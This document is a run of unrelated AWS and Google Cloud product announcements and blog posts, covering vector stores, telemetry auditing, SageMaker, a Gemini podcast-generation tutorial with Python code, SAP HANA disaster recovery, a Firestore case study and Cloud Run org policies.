Amazon Aurora PostgreSQL is now available as a quick create vector store in Amazon Bedrock Knowledge Bases. With the new Aurora quick create option, developers and data scientists building generative AI applications can select Aurora PostgreSQL as their vector store with one click to deploy an Aurora Serverless cluster preconfigured with pgvector in minutes. Aurora Serverless is an on-demand, autoscaling configuration where capacity is adjusted automatically based on application demand, making it ideal as a developer vector store.
Knowledge Bases securely connects foundation models (FMs) running in Bedrock to your company data sources for Retrieval Augmented Generation (RAG) to deliver more relevant, context-specific, and accurate responses that make your FM more knowledgeable about your business. To implement RAG, organizations must convert data into embeddings (vectors) and store these embeddings in a vector store for similarity search in generative artificial intelligence (AI) applications. Aurora PostgreSQL, with the pgvector extension, has been supported as a vector store in Knowledge Bases for existing Aurora databases. With the new quick create integration with Knowledge Bases, Aurora is now easier to set up as a vector store for use with Bedrock.
The quick create option in Bedrock Knowledge Bases is available in these regions with the exception of AWS GovCloud (US-West) which is planned for Q4 2024. To learn more about RAG with Amazon Bedrock and Aurora, see Amazon Bedrock Knowledge Bases.
Amazon Aurora combines the performance and availability of high-end commercial databases with the simplicity and cost-effectiveness of open-source databases. To get started using Amazon Aurora PostgreSQL as a vector store for Amazon Bedrock Knowledge Bases, take a look at our documentation.
Amazon CloudWatch now offers centralized visibility into critical AWS service telemetry configurations, such as Amazon VPC Flow Logs, Amazon EC2 Detailed Metrics, and AWS Lambda Traces. This enhanced visibility enables central DevOps teams, system administrators, and service teams to identify potential gaps in their infrastructure monitoring setup. The telemetry configuration auditing experience seamlessly integrates with AWS Config to discover AWS resources, and can be turned on for the entire organization using the new AWS Organizations integration with Amazon CloudWatch.
With visibility into telemetry configurations, you can identify monitoring gaps that might have been missed in your current setup. For example, this helps you identify gaps in your EC2 detailed metrics so that you can address them and easily detect short-lived performance spikes and build responsive auto-scaling policies. You can audit telemetry configuration coverage at both resource type and individual resource levels, refining the view by filtering across specific accounts, resource types, or resource tags to focus on critical resources.
The telemetry configurations auditing experience is available in US East (N. Virginia), US West (Oregon), US East (Ohio), Asia Pacific (Tokyo), Asia Pacific (Singapore), Asia Pacific (Sydney), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm) regions. There is no additional cost to turn on the new experience, including for AWS Config.
You can get started with auditing your telemetry configurations using the Amazon CloudWatch Console, by clicking on Telemetry config in the navigation panel, or programmatically using the API/CLI. To learn more, visit our documentation.
AWS Config added support for a service-linked recorder, a new type of AWS Config recorder that is managed by an AWS service and can record configuration data on service-specific resources, such as the new Amazon CloudWatch telemetry configurations audit. By enabling the service-linked recorder in Amazon CloudWatch, you gain centralized visibility into critical AWS service telemetry configurations, such as Amazon VPC Flow Logs, Amazon EC2 Detailed Metrics, and AWS Lambda Traces.
With service-linked recorders, an AWS service can deploy and manage an AWS Config recorder on your behalf to discover resources and utilize the configuration data to provide differentiated features. For example, an Amazon CloudWatch managed service-linked recorder helps you identify monitoring gaps within specific critical resources within your organization, providing a centralized, single-pane view of telemetry configuration status. Service-linked recorders are immutable to ensure consistency, prevention of configuration drift, and simplified experience. Service-linked recorders operate independently of any existing AWS Config recorder, if one is enabled. This allows you to independently manage your AWS Config recorder for your specific use cases while authorized AWS services can manage the service-linked recorder for feature specific requirements.
Amazon CloudWatch managed service-linked recorder is now available in US East (N. Virginia), US West (Oregon), US East (Ohio), Asia Pacific (Tokyo), Asia Pacific (Singapore), Asia Pacific (Sydney) Europe (Frankfurt), Europe (Ireland), Europe (Stockholm) regions. The AWS Config service-linked recorder specific to Amazon CloudWatch telemetry configuration feature is available to customers at no additional cost.
This on-demand analysis experience, which was previously available in only 15 regions, is now available in all commercial regions. This feature allows you to analyze Performance Insights data for a time period of your choice. You can learn how the selected time period differs from normal, what went wrong, and get advice on corrective actions. Through simple-to-understand graphs and explanations, you can identify the chief contributors to performance issues. You will also get the guidance on the next steps to act on these issues. This can reduce the mean-time-to-diagnosis for database performance issues from hours to minutes.
Amazon RDS Performance Insights is a database performance tuning and monitoring feature of RDS that allows you to visually assess the load on your database and determine when and where to take action. With one click in the Amazon RDS Management Console, you can add a fully-managed performance monitoring solution to your Amazon RDS database.
We are excited to announce two new capabilities in SageMaker Inference that significantly enhance the deployment and scaling of generative AI models: Container Caching and Fast Model Loader. These innovations address critical challenges in scaling large language models (LLMs) efficiently, enabling faster response times to traffic spikes and more cost-effective scaling. By reducing model loading times and accelerating autoscaling, these features allow customers to improve the responsiveness of their generative AI applications as demand fluctuates, particularly benefiting services with dynamic traffic patterns.
Container Caching dramatically reduces the time required to scale generative AI models for inference by pre-caching container images. This eliminates the need to download them when scaling up, resulting in significant reduction in scaling time for generative AI model endpoints. Fast Model Loader streams model weights directly from Amazon S3 to the accelerator, loading models much faster compared to traditional methods. These capabilities allow customers to create more responsive auto-scaling policies, enabling SageMaker to add new instances or model copies quickly when defined thresholds are reached, thus maintaining optimal performance during traffic spikes while at the same time managing costs effectively.
These new capabilities are accessible in all AWS regions where Amazon SageMaker Inference is available. To learn more see our documentation for detailed implementation guidance.
Today, we are introducing the new ModelTrainer class and enhancing the ModelBuilder class in the SageMaker Python SDK. These updates streamline training workflows and simplify inference deployments.
The ModelTrainer class enables customers to easily set up and customize distributed training strategies on Amazon SageMaker. This new feature accelerates model training times, optimizes resource utilization, and reduces costs through efficient parallel processing. Customers can smoothly transition their custom entry points and containers from a local environment to SageMaker, eliminating the need to manage infrastructure. ModelTrainer simplifies configuration by reducing parameters to just a few core variables and providing user-friendly classes for intuitive SageMaker service interactions. Additionally, with the enhanced ModelBuilder class, customers can now easily deploy HuggingFace models, switch between developing in local environment to SageMaker, and customize their inference using their pre- and post-processing scripts. Importantly, customers can now pass the trained model artifacts from ModelTrainer class easily to ModelBuilder class, enabling a seamlessly transition from training to inference on SageMaker.
You can learn more about ModelTrainer class here, ModelBuilder enhancements here, and get started using ModelTrainer and ModelBuilder sample notebooks.
Generative AI is giving people new ways to experience audio content, from podcasts to audio summaries. For example, users are embracing NotebookLM’s recent Audio Overview feature, which turns documents into audio conversations. With one click, two AI hosts start up a lively “deep dive” discussion based on the sources you provide. They summarize your material, make connections between topics, and discuss back and forth.
While Notebook LM offers incredible benefits for making sense of complex information, some users want more control over generating unique audio experiences – for example, creating their own podcasts. Podcasts are an increasingly popular medium for creators, business leaders, and users to listen to what interests them. Today, we’ll share how Gemini 1.5 Pro and the Text-to-Speech API on Google Cloud can help you create conversations with diverse voices and generate podcast scripts with custom prompts.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef677ac5d90>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The approach: Expand your reach with diverse audio formats
A great podcast starts with accessible audio content. Gemini’s multimodal capabilities, combined with our high-fidelity Text-to-Speech API, offers 380+ voices across 50+ languages and custom voice creation. This unlocks new ways for users to experience content and expand their reach through diverse audio formats.
This approach also helps content creators reach a wider audience and streamline the content creation process, including:
Expanded reach: Connect with an audience segment that prefers audio content.
Increased engagement: Foster deeper connections with listeners through personalized audio.
Content repurposing: Maximize the value of existing written content by transforming it into a new format, reaching a wider audience without starting from scratch.
Let’s take a look at how.
The architecture: Gemini 1.5 Pro and Text-to-Speech
Our audio overview creation architecture uses two powerful services from Google Cloud:
Gemini 1.5 Pro: This advanced generative AI model excels at understanding and generating human-like text. We’ll use Gemini 1.5 Pro to:
Generate engaging scripts: Feed your podcast content overview to Gemini 1.5 Pro, and it can generate compelling conversational scripts, complete with introductions, transitions, and calls to action.
Adapt content for audio: Gemini 1.5 Pro can optimize written content for the audio format, ensuring a natural flow and engaging listening experience. It can also adjust the tone and style to suit any format such as podcasts.
Text-to-Speech API: This API converts text into natural-sounding speech, giving a voice to your scripts. You can choose from various voices and languages to match your brand and target audience.
How to create an engaging podcast yourself, step-by-step
Content preparation: Prepare your podcast. Ensure it’s well-structured and edited for clarity. Consider dividing longer posts into multiple episodes for optimal listening duration.
Gemini 1.5 Pro integration: Use Gemini 1.5 Pro to generate a conversational script from your podcast. Experiment with prompts to fine-tune the output, achieving the desired style and tone. Example prompt: “Generate an engaging audio overview script from this podcast, including an introduction, transitions, and a call to action. Target audience is technical developers, engineers, and cloud architects.”
Section extraction: For complex or lengthy podcasts, you might use Gemini 1.5 Pro to extract key sections and subsections as JSON, enabling a more structured approach to script generation.
A python function that powers our podcast creation process can look as simple as below:
code_block
<ListValue: [StructValue([(‘code’, ‘def extract_sections_and_subsections(document1: Part, project=”<your-project-id>”, location = “us-central1”) -> str:rn “””rn Extracts hierarchical sections and subsections from a Google Cloud blog postrn provided as a PDF document.rnrnrn This function uses the Gemini 1.5 Pro language model to analyze the structurern of a blog post and identify its key sections and subsections. The extractedrn information is returned in JSON format for easy parsing and use inrn various applications.rnrnrn This is particularly useful for:rnrnrn * **Large documents:** Breaking down content into manageable chunks forrn efficient processing and analysis.rn * **Podcast creation:** Generating multi-episode series where each episodern focuses on a specific section of the blog post.rnrnrn Args:rn document1 (Part): A Part object representing the PDF document,rn typically obtained using `Part.from_uri()`.rn For example:rn “`pythonrn document1 = Part.from_uri(rn mime_type=”application/pdf”,rn uri=”gs://your-bucket/your-pdf.pdf”rn )rn “`rn location: The region of your Google Cloud project. Defaults to “us-central1”.rn project: The ID of your Google Cloud project. Defaults to “<your-project-id>”.rnrnrnrnrn Returns:rn str: A JSON string representing the extracted sections and subsections.rn Returns an empty string if there are issues with processing orrn the model output.rn “””rnrnrn vertexai.init(project=project, location=location) # Initialize Vertex AIrn model = GenerativeModel(“gemini-1.5-pro-002”)rnrnrn prompt = “””Analyze the following blog post and extract its sections and subsections. Represent this information in JSON format using the following structure:rn [rn {rn “section”: “Section Title”,rn “subsections”: [rn “Subsection 1”,rn “Subsection 2”,rn // …rn ]rn },rn // … more sectionsrn ]”””rnrnrn try:rn responses = model.generate_content(rn [“””The pdf file contains a Google Cloud blog post required for podcast-style analysis:”””, document1, prompt],rn generation_config=generation_config,rn safety_settings=safety_settings,rn stream=True, # Stream results for better performance with large documentsrn )rnrnrn response_text = “”rn for response in responses:rn response_text += response.textrnrnrn return response_textrnrnrn except Exception as e:rn print(f”Error during section extraction: {e}”)rn return “”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ef677f01a60>)])]>
Then, use Gemini 1.5 Pro to generate the podcast script for each section. Again, provide clear instructions in your prompts, specifying target audience, desired tone, and approximate episode length.
For each section and subsection you can use a function like below to generate a script:
code_block
<ListValue: [StructValue([(‘code’, ‘def generate_podcast_content(section, subsection, document1:Part, targetaudience, guestname, hostname, project=”<your-project-id>”, location=”us-central1″) -> str:rn “””Generates a podcast dialogue in JSON format from a blog post subsection.rnrnrn This function uses the Gemini model in Vertex AI to create a conversationrn between a host and a guest, covering the specified subsection content. It usesrn a provided PDF as source material and outputs the dialogue in JSON.rnrnrn Args:rn section: The blog post’s main section (e.g., “Introduction”).rn subsection: The specific subsection (e.g., “Benefits of Gemini 1.5″).rn document1: A `Part` object representing the source PDF (created usingrn `Part.from_uri(mime_type=”application/pdf”, uri=”gs://your-bucket/your-pdf.pdf”)`).rn targetaudience: The intended audience for the podcast.rn guestname: The name of the podcast guest.rn project: Your Google Cloud project ID.rn location: Your Google Cloud project location.rnrnrn Returns:rn A JSON string representing the generated podcast dialogue.rn “””rn print(f”Processing section: {section} and subsection: {subsection}”)rnrnrn prompt = f”””Create a podcast dialogue in JSON format based on a provided subsection of a Google Cloud blog post (found in the attached PDF).rn The dialogue should be a lively back-and-forth between a host (R) and a guest (S), presented as a series of turns.rn The host should guide the conversation by asking questions, while the guest provides informative and accessible answers.rn The script must fully cover all points within the given subsection.rn Use clear explanations and relatable analogies.rn Maintain a consistently positive and enthusiastic tone (e.g., “Movies, I love them. They’re like time machines…”).rn Include only one introductory host greeting (e.g., “Welcome to our next episode…”). No music, sound effects, or production directions.rnrnrn JSON structure:rn {{rn “multiSpeakerMarkup”: {{rn “turns”: [rn {{“text”: “Podcast script content here…”, “speaker”: “R”}}, // R for host, S for guestrn // … more turnsrn ]rn }}rn }}rnrnrn Input Data:rn Section: “{section}”rn Subsections to cover in the podcast: “{subsection}”rn Target Audience: “{targetaudience}”rn Guest name: “{guestname}”rn Host name: “{hostname}”rn “””rnrnrn vertexai.init(project=project, location=location)rn model = GenerativeModel(“gemini-1.5-pro-002”)rnrnrn responses = model.generate_content(rn [“””The pdf file contains a Google Cloud blog post required for podcast-style analysis:”””, document1, prompt],rn generation_config=generation_config, # Assuming these are defined alreadyrn safety_settings=safety_settings, # Assuming these are defined alreadyrn stream=True,rn )rnrnrn response_text = “”rn for response in responses:rn response_text += response.textrnrnrn return response_text’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ef677f010d0>)])]>
Next, feed the generated script by Gemini to the Text-to-Speech API. Choose a voice and language appropriate for your target audience and content.
A function as below can generate human quality audio based on text. For this we can use the advanced text-to-speech API in Google Cloud.
code_block
<ListValue: [StructValue([(‘code’, ‘def generate_audio_from_text(input_json):rn “””Generates audio using Google Text-to-Speech API.rnrnrn Args:rn input_json: A dictionary containing the ‘multiSpeakerMarkup’ for the TTS API. This is generated by the Gemini 1.5 Pro model in the buildPodCastContent() function. rnrnrn Returns:rn The audio data in bytes (MP3 format) if successful, None otherwise.rn “””rnrnrn try:rn # Build the Text-to-Speech servicern service = build(‘texttospeech’, ‘v1beta1’)rnrnrn # Prepare synthesis inputrn synthesis_input = {rn ‘multiSpeakerMarkup’: input_json[‘multiSpeakerMarkup’]rn }rnrnrn # Configure voice and audio settingsrn voice = {rn ‘languageCode’: ‘en-US’,rn ‘name’: ‘en-US-Studio-MultiSpeaker’rn }rnrnrn audio_config = {rn ‘audioEncoding’: ‘MP3’,rn ‘pitch’: 0,rn ‘speakingRate’: 0,rn ‘effectsProfileId’: [‘small-bluetooth-speaker-class-device’]rn }rnrnrn # Make the API requestrn response = service.text().synthesize(rn body={rn ‘input’: synthesis_input,rn ‘voice’: voice,rn ‘audioConfig’: audio_configrn }rn ).execute()rnrnrn # Extract and return audio contentrn audio_content = response[‘audioContent’]rn return audio_contentrnrnrn except Exception as e:rn print(f”Error: {e}”) # More informative error messagern return None’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ef677f01a90>)])]>
Finally, to store audio content already encoded as base64 MP3 data in Google Cloud Storage, you can use the google-cloud-storage Python library. This allows you to decode the base64 string and upload the resulting bytes directly to a designated bucket, specifying the content type as ‘audio/mp3’.
Hear it for yourself
While the Text-to-Speech API produces high-quality audio, you can further enhance your audio conversation with background music, sound effects, and professional editing using tools.Hear it for yourself – download the audio conversation I created from this blog using Gemini 1.5 Pro and Text-to-Speech API.
To start creating for yourself, explore our full suite of audio generation features using Google Cloud services, such as Text-to-Speech API and Gemini models using the free tier. We recommend experimenting with different modalities like text and image prompts to experience Gemini’s potential for content creation.
Like many businesses, your SAP HANA database is the heart of your SAP business applications, a repository of mission-critical data that drives your operations. But what happens when disaster strikes?
Protecting a SAP HANA system involves choices. Common methods include HANA System Replication (HSR) for high availability and Backint for backups. But while having a disaster recovery (DR) strategy is crucial, it doesn’t need to be overly complex or expensive. While HSR offers rapid recovery, it requires a significant investment. For many SAP deployments, a cold DR strategy strikes the perfect balance between cost-effectiveness and recovery time objectives (RTOs).
What is cold DR? Think of it as your backup plan’s backup plan. It minimizes costs by maintaining a non-running environment that’s only activated when disaster strikes. This traditionally means longer RTOs compared to hot or warm DR, but significantly lower costs, and while often deemed sufficient, any improvement on RTO and lower cost is what businesses are often in search of.
Backint, when paired with storage (e.g. Persistent Disk and Cloud Storage) enables data transfer to a secondary location, and can be an effective cold DR solution. However, using Backint for DR can mean longer restore times and high storage costs, especially for large databases. Google Cloud is delivering a solution addressing both the cost-effectiveness of cold DR and the rapid recovery of a full DR solution: Backup and DR Service with Persistent Disk (PD) snapshot integration. This innovative approach leverages the power of incremental forever backups and HANA Savepoints to protect your SAP HANA environment.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef6421c6fd0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Rethinking SAP disaster recovery in Google Cloud
Backup and DR is an enterprise backup and recovery solution that integrates directly with cloud-based workloads that run in Google Compute Engine. Backup and DR provides backup and recovery capabilities for virtual machines (VMs), file systems, multiple SAP databases (HANA, ASE, MaxDB, IQ) as well as Oracle, Microsoft SQL Server, and Db2. You can elect to create backup plans to configure the time of backup, how long to retain backups, where to store the backups (regional/multi-regional) and in what tier of storage, along with specifying database log backup intervals to help ensure a low recovery point objective (RPO).
A recent Backup and DR feature offers Persistent Disk (PD) snapshot integration for SAP HANA databases. This is a significant advancement because these PD snapshots are integrated with SAP HANA Savepoints to help ensure database consistency. When the database is scheduled to be backed up, the Backup and DR agent running in the SAP HANA node instructs the database to trigger a Savepoint image, where all changed data is written to storage in the form of pages. Another benefit of this integration is that the data copy process occurs on the storage side. You no longer copy the backup data through the same network interfaces that the database or operating system are using. This results in production workloads retaining the compute and networking resources, even during an active backup
Once completed, Backup and DR services trigger the PD snapshots from the Google Cloud storage APIs, so that the image is captured on disk, and logs can also be truncated if desired. All of these snapshots are “incremental forever” and database-consistent backups. Alternatively, you can use logs to recover to a point in time (from the HANA PD snapshot image).
Integration with SAP HANA Savepoints is critical to this process. Savepoints are SAP HANA API calls whose primary use is to help speed up recovery restart times, to provide a low RTO. They achieve this because when the system is starting up, logs don’t need to be processed from the beginning, but only from the last Savepoint position. Savepoints are coordinated across all processes (called SAP HANA services) and instances of the database to ensure transaction consistency.
The HANA Savepoint Backup sequence using PD snapshots can be summarized as:
Tell agent to initiate HANA Savepoint
Initiate PD snapshot, wait for ‘Uploading’ state (seconds)
Tell agent to close HANA Savepoint
Wait for PD snapshot ‘Ready’ state (minutes)
Expire any logs on disk that have passed expiration time
Catalog backup for reporting, auditing
In addition, you can configure log backups to occur regularly, independent of Savepoint snapshots. These logs are stored on a separate disk and also backed up via PD snapshots, allowing for point-in-time recovery.
Operating system backups
What about the operating system backups? Good news: Backup and DR lets you take PD snapshots for the bootable OS and selectively any other disk attached directly to your Compute Engine VMs. These backup images can be also stored in the same regional or multi-regional location for cold DR purposes.
You can then restore HANA databases to a local VM or your disaster recovery (DR) region. This flexibility allows you to use your DR region for a variety of purposes, such as development and testing, or maintaining a true cold DR region for cost efficiency.
Backup and DR helps simplify DR setup by allowing you to pre-configure networks, firewall rules, and other dependencies. It can then quickly provision a backup appliance in your DR region and restore your entire environment, including VMs, databases, and logs.
This approach gives you the freedom to choose the best DR strategy for your needs: hot, warm, or cold, each with its own cost, RPO, and RTO implications.
One of the key advantages of using Backup and DR with PD snapshots is the significant cost savings it offers compared to traditional DR methods. By eliminating the need for full backups and leveraging incremental forever snapshots, customers can reduce their storage costs by up to 50%, in our testing. Additionally, we found that using a cold DR region with Backup and DR can reduce storage consumption by 30% or more compared to using a traditional backup to file methodology.
Why this matters
Using Google Cloud’s Backup and DR to protect your SAP HANA environment brings a lot of benefits:
Better backup performance(throughput) – storage layer handles data transfer rather than an agent on the HANA server
Reduced TCO through elimination of regular full backups
Reduced I/O on the SAP HANA server by avoiding database reads and the writes during the backup window that can be very long by comparison to a regular Backint full backup event.
Operational simplicity with an onboarding wizard, and no need to manage additional storage provisioning on the source host
Faster recovery times (local or DR) as PD Snapshots recover natively to the VM storage subsystem (not copied over customer networks). Recovery to a point-in-time is possible with logs from the HANA PD Snapshot. You can even take more frequent Savepoints by scheduling these every few hours, to further reduce the log recovery time for restores
Data resiliency – HANA PD Snapshots are stored in regional or multi-regional locations
Low Cost DR – Since Backup images for VMs and Databases are already replicated to your DR region (via regional or multi-regional PD snapshots), recovery is just a matter of bringing up your VM, then choosing your recovery point-in-time for the SAP HANA Database and waiting for a short period of time
When to choose Persistent Disk Asynchronous Replication
While Backup and DR offers a comprehensive solution for many, some customers may have specific needs or preferences that require a different approach. For example, if your SAP application lacks built-in replication, or you need to replicate your data at the disk level, Persistent Disk Asynchronous Replication is a valuable alternative. This approach allows you to spin up new VMs in your DR region using replicated disks, speeding up the recovery process.
PD Async’s infrastructure-level replication is application agnostic, making it ideal for applications without built-in replication. It’s also cost-effective, as you only pay for the storage used by the replicated data. Plus, it offers flexibility, allowing you to customize the replication frequency to balance cost and RPOs.
If you are interested in setting up PD Async, and would like to configure this within Terraform, please take a look at one of our colleagues who created this Terraform example for how to test in a failover and failback scenario for a number of Compute Engine VMs.
Take control of your SAP disaster recovery
By leveraging Google Cloud’s Backup and DR and PD Async, you can build a robust and cost-effective cold DR solution for your SAP deployments on Google Cloud that minimizes costs without compromising on data protection, providing peace of mind in the face of unexpected disruptions.
HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef6787c9400>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore‘s serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure.
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database. This approach allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
Lessons learned and a path forward
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will continue to be a cornerstone of our technology stack as we continue to grow and evolve. Moving forward, we are excited to continue leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Usually, financial institutions process multiple millions of transactions daily. Obviously, when running on cloud technology, any security lapse in their cloud infrastructure might have catastrophic consequences. In serverless setups for compute workloads Cloud Run on Google Cloud is employed. That’s why we are happy to announce the general availability of Google Cloud’s custom org policies to fortify Cloud Run environments and ensure it can be aligned seamlessly to fulfill the weakest up to stringent regulatory standards.
Financial service institutions operate under stringent global and local regulatory frameworks and bodies, such as regulations from the EU’s European Banking Authority, US Securities and Exchange Commission, or the Monetary Authority of Singapore. Also, the sensitive nature of financial data necessitates robust security measures. Hence, maintaining a comprehensive security posture is of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ef677699940>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Tailored Security, Configurable to Customer’s Needs
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization is able to prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage ensure getting the most out of cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general vailability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements.
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of our serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control possible due to Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real-time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the world of data lakes and warehouses. BigQuery’s unified data and AI capabilities combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration, by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simplified, eliminating complex coding and saving valuable time and data movement costs.
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data.
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
